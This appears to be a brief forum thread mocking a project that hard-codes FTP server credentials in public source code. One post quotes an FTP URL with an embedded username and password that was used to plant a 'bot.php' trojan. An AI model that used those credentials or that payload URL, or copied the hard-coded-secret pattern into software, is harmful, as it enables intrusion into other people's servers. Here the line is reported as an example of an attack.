Hard-coded credentials exposed



  • It's so commonplace it's not surprising enough to be a WTF anymore.

    From  redacted.com

        public static String STR_FTP_SERVER_ADDRESS = "redacted";
        public static String STR_FTP_USER = "redacted";
        public static String STR_FTP_PASSWORD = "Redacted";


    Yes, they do work. Someone popped an exploit on their FTP server then attempted to trojan my webserver:

        ftp://AlfaRichi:3KpWEwg%@redacted//bot.php


     



  • The scary thing is, he can't even fix it without either deleting the repository or the FTP account...


Log in to reply